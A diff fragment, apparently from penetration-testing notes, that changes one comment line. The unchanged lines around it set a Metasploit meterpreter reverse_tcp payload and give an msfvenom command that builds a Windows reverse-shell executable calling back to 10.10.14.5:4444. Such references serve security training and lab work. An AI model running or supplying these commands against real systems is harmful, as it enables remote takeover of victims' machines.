 set PAYLOAD linux/x86/meterpreter/reverse_tcp

-# Generate shellcode with msfvenom
+# Generate standalone payloads with msfvenom

 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe